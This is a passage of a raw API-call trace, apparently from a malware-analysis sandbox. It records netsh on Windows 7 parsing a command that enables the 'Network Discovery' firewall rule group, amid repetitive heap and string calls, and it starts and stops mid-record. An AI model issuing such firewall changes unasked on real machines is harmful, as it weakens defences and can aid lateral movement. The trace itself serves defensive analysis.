hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539700 | out: hHeap=0x4f0000) returned 1 [0130.812] RegisterContext () returned 0x0 [0130.812] GetProcessHeap () returned 0x4f0000 [0130.812] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0130.812] RegisterContext () returned 0x0 [0130.812] GetProcessHeap () returned 0x4f0000 [0130.812] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0130.812] RegisterContext () returned 0x0 [0130.812] GetProcessHeap () returned 0x4f0000 [0130.812] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54bd50 | out: hHeap=0x4f0000) returned 1 [0132.908] RegisterContext () returned 0x0 [0132.908] GetProcessHeap () returned 0x4f0000 [0132.908] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54c268 | out: hHeap=0x4f0000) returned 1 [0132.908] RegisterContext () returned 0x0 [0132.909] GetProcessHeap () returned 0x4f0000 [0132.909] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0132.909] SetConsoleCtrlHandler (HandlerRoutine=0x15f7c89, Add=1) returned 1 [0132.909] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0132.909] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0132.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.910] FreeLibrary (hLibModule=0x76d30000) returned 1 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-?") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-h") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="?") returned 34 [0132.910] _wcsicmp (_String1="advfirewall", _String2="/?") returned 50 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-v") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-a") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-c") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-f") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-r") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-u") returned 52 [0132.910] _wcsicmp (_String1="advfirewall", _String2="-p") returned 52 [0132.910] GetVersionExW (in: lpVersionInformation=0x247988*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247988*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0132.910] _vsnwprintf (in: _Buffer=0x15fb338, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x247974 | out: _Buffer="6.1.7601") returned 8 [0132.910] _vsnwprintf (in: _Buffer=0x15fb748, _BufferCount=0x103, _Format="%d", _ArgList=0x247964 | out: _Buffer="7601") returned 4 [0132.910] _vsnwprintf (in: _Buffer=0x15fb540, _BufferCount=0x103, _Format="%d", _ArgList=0x247954 | out: _Buffer="1") returned 1 [0132.911] _vsnwprintf (in: _Buffer=0x15fb950, _BufferCount=0x103, _Format="%d", _ArgList=0x247944 | out: _Buffer="0") returned 1 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d48 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d60 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d78 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d90 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540da8 [0132.911] wcscpy_s (in: _Destination=0x540da8, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d78 | out: hHeap=0x4f0000) returned 1 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d60 | out: hHeap=0x4f0000) returned 1 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d60 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d78 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8e) returned 0x539700 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540dc0 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53a960 [0132.911] wcscpy_s (in: _Destination=0x53a960, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540dd8 [0132.911] GetProcessHeap () returned 0x4f0000 [0132.911] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x53a980 [0132.912] wcscpy_s (in: _Destination=0x53a980, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540df0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539608 [0132.912] wcscpy_s (in: _Destination=0x539608, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e08 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa) returned 0x540e20 [0132.912] wcscpy_s (in: _Destination=0x540e20, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e38 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e50 [0132.912] wcscpy_s (in: _Destination=0x540e50, _SizeInWords=0x6, _Source="group" | out: _Destination="group") returned 0x0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e68 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x539618 [0132.912] wcscpy_s (in: _Destination=0x539618, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e80 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x28) returned 0x53ec30 [0132.912] wcscpy_s (in: _Destination=0x53ec30, _SizeInWords=0x14, _Source="\"Network Discovery\"" | out: _Destination="\"Network Discovery\"") returned 0x0 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e98 [0132.912] GetProcessHeap () returned 0x4f0000 [0132.912] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539628 [0132.913] wcscpy_s (in: _Destination=0x539628, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540eb0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe) returned 0x540ec8 [0132.913] wcscpy_s (in: _Destination=0x540ec8, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540ee0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x539638 [0132.913] wcscpy_s (in: _Destination=0x539638, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540ef8 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539648 [0132.913] wcscpy_s (in: _Destination=0x539648, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539700 | out: hHeap=0x4f0000) returned 1 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d78 | out: hHeap=0x4f0000) returned 1 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d78 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53a9a0 [0132.913] wcscpy_s (in: _Destination=0x53a9a0, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a960 | out: hHeap=0x4f0000) returned 1 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540dc0 | out: hHeap=0x4f0000) returned 1 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540dc0 [0132.913] GetProcessHeap () returned 0x4f0000 [0132.913] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53a960 [0132.914] wcscpy_s (in: _Destination=0x53a960, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a9a0 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d78 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540d78 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x53a9a0 [0132.914] wcscpy_s (in: _Destination=0x53a9a0, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a980 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540dd8 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540dd8 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539658 [0132.914] wcscpy_s (in: _Destination=0x539658, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539608 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540df0 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540df0 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa) returned 0x540f10 [0132.914] wcscpy_s (in: _Destination=0x540f10, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.914] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e20 | out: hHeap=0x4f0000) returned 1 [0132.914] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e08 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e08 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e20 [0132.915] wcscpy_s (in: _Destination=0x540e20, _SizeInWords=0x6, _Source="group" | out: _Destination="group") returned 0x0 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e50 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e38 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e38 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x539608 [0132.915] wcscpy_s (in: _Destination=0x539608, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539618 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e68 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e68 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x28) returned 0x53ec60 [0132.915] wcscpy_s (in: _Destination=0x53ec60, _SizeInWords=0x14, _Source="\"Network Discovery\"" | out: _Destination="\"Network Discovery\"") returned 0x0 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53ec30 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e80 | out: hHeap=0x4f0000) returned 1 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e80 [0132.915] GetProcessHeap () returned 0x4f0000 [0132.915] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539618 [0132.916] wcscpy_s (in: _Destination=0x539618, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539628 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e98 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540e98 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe) returned 0x540e50 [0132.916] wcscpy_s (in: _Destination=0x540e50, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540ec8 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540eb0 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540eb0 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x539628 [0132.916] wcscpy_s (in: _Destination=0x539628, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539638 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540ee0 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540ee0 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539638 [0132.916] wcscpy_s (in: _Destination=0x539638, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.916] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539648 | out: hHeap=0x4f0000) returned 1 [0132.916] GetProcessHeap () returned 0x4f0000 [0132.917] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540ef8 | out: hHeap=0x4f0000) returned 1 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x30) returned 0x54afd8 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540ef8 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53a980 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x53a9c0 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539648 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa) returned 0x540ec8 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f28 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x540f28, Size=0xe) returned 0x540f40 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x540f40, Size=0x32) returned 0x536858 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539668 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe) returned 0x540f40 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x540f40, Size=0x10) returned 0x540f28 [0132.917] GetProcessHeap () returned 0x4f0000 [0132.917] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x540f28, Size=0x16) returned 0x53a9e0 [0132.917] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x540f28, Size=0xe) returned 0x540f40 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x540f40, Size=0x24) returned 0x53ec30 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x53ec30, Size=0x26) returned 0x53ec90 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x53ec90, Size=0x36) returned 0x536898 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x536898, Size=0x38) returned 0x5368d8 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5368d8, Size=0x3e) returned 0x51f0a0 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x51f0a0, Size=0x40) returned 0x51f0e8 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x51f0e8, Size=0x48) returned 0x5261d8 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5261d8, Size=0x4a) returned 0x53f438 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x53f438, Size=0x4c) returned 0x53f490 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x53f490, Size=0x7a) returned 0x539700 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x539700, Size=0x7c) returned 0x539700 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x539700, Size=0x7e) returned 0x539700 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x539700, Size=0x84) returned 0x539700 [0132.918] GetProcessHeap () returned 0x4f0000 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x539700, Size=0x86) returned 0x539700 [0132.918] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x539700, Size=0x9a) returned 0x54c248 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54c248 | out: hHeap=0x4f0000) returned 1 [0132.920] _wcsnicmp (_String1="advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0132.920] _wcsnicmp (_String1="advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0132.920] _wcsnicmp (_String1="advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0132.920] _wcsnicmp (_String1="advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0132.920] _wcsnicmp (_String1="advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f40 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f28 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9a) returned 0x54c248 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f58 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f70 [0132.920] wcscpy_s (in: _Destination=0x540f70, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f88 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53aa00 [0132.920] wcscpy_s (in: _Destination=0x53aa00, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540fa0 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.920] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x53aa20 [0132.920] wcscpy_s (in: _Destination=0x53aa20, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0132.920] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540fb8 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539678 [0132.921] wcscpy_s (in: _Destination=0x539678, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540fd0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa) returned 0x540fe8 [0132.921] wcscpy_s (in: _Destination=0x540fe8, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x541000 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x34) returned 0x5368d8 [0132.921] wcscpy_s (in: _Destination=0x5368d8, _SizeInWords=0x1a, _Source="\"group=Network Discovery\"" | out: _Destination="\"group=Network Discovery\"") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x541018 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x539688 [0132.921] wcscpy_s (in: _Destination=0x539688, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f418 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe) returned 0x54f430 [0132.921] wcscpy_s (in: _Destination=0x54f430, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, 